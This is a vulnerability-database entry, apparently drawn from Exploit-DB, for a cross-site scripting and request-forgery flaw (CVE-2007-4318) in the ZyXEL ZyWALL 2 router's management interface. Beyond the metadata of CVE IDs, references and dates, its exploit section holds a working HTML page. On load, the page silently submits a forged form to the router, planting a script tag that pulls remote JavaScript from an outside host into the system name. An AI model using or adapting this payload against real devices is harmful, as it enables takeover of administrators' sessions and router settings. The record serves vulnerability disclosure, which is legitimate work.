ID
VAR-E-200708-0103
CVE
| cve_id: | CVE-2007-4318 | Trust: 1.6 |
| cve_id: | CVE-2007-4317 | Trust: 0.3 |
| cve_id: | CVE-2007-4319 | Trust: 0.3 |
EDB ID
30485
TITLE
ZYXEL ZyWALL 2 3.62 - '/Forms/General_1?sysSystemName' Cross-Site Scripting - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
ZYXEL ZyWALL 2 3.62 - '/Forms/General_1?sysSystemName' Cross-Site Scripting. CVE-2007-4318CVE-38721 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | zyxel | model: | zywall | scope: | eq | version: | 23.62 | Trust: 1.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/25262/info
ZyXEL ZyWALL 2 is prone to multiple remote vulnerabilities that affect the management interface.
An attacker can exploit these issues to carry out cross-site request forgery, HTML-injection, and denial-of-service attacks.
ZyWALL 2 running with firmware V3.62(WK.6) is reported vulnerable to this issue.
<html>
<body onload="document.CSRF.submit()">
<FORM name="CSRF" METHOD="POST"
ACTION="http://192.168.1.1/Forms/General_1">
<INPUT NAME="sysSystemName" VALUE="<script src='http://nx.fi/X'>"
<INPUT NAME="sysDomainName" VALUE="evil.com">
<INPUT NAME="StdioTimout" VALUE="0">
<INPUT NAME="sysSubmit" VALUE="Apply">
</form>
</body>
</html>
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'/Forms/General_1?sysSystemName' Cross-Site Scripting
Trust: 1.0
CREDITS
Henri Lindberg
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 30485 | Trust: 1.9 |
| db: | BID | id: | 25262 | Trust: 1.9 |
| db: | NVD | id: | CVE-2007-4318 | Trust: 1.6 |
| db: | EDBNET | id: | 52129 | Trust: 0.6 |
| db: | NVD | id: | CVE-2007-4317 | Trust: 0.3 |
| db: | NVD | id: | CVE-2007-4319 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2007-4318 | Trust: 1.6 |
| url: | https://www.securityfocus.com/bid/25262/info | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/30485/ | Trust: 0.6 |
| url: | http://www.louhi.fi/advisory/zyxel_070810.txt | Trust: 0.3 |
| url: | https://www.exploit-db.com/exploits/30485 | Trust: 0.3 |
| url: | http://us.zyxel.com/products/model.php?indexcate=1044940679&indexcate1=1123007871&indexflagvalue=1021873683 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 25262 |
| db: | EXPLOIT-DB | id: | 30485 |
| db: | EDBNET | id: | 52129 |
LAST UPDATE DATE
2022-07-27T09:26:00.693000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 25262 | date: | 2016-07-05T22:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 25262 | date: | 2007-08-10T00:00:00 |
| db: | EXPLOIT-DB | id: | 30485 | date: | 2007-08-10T00:00:00 |
| db: | EDBNET | id: | 52129 | date: | 2007-08-10T00:00:00 |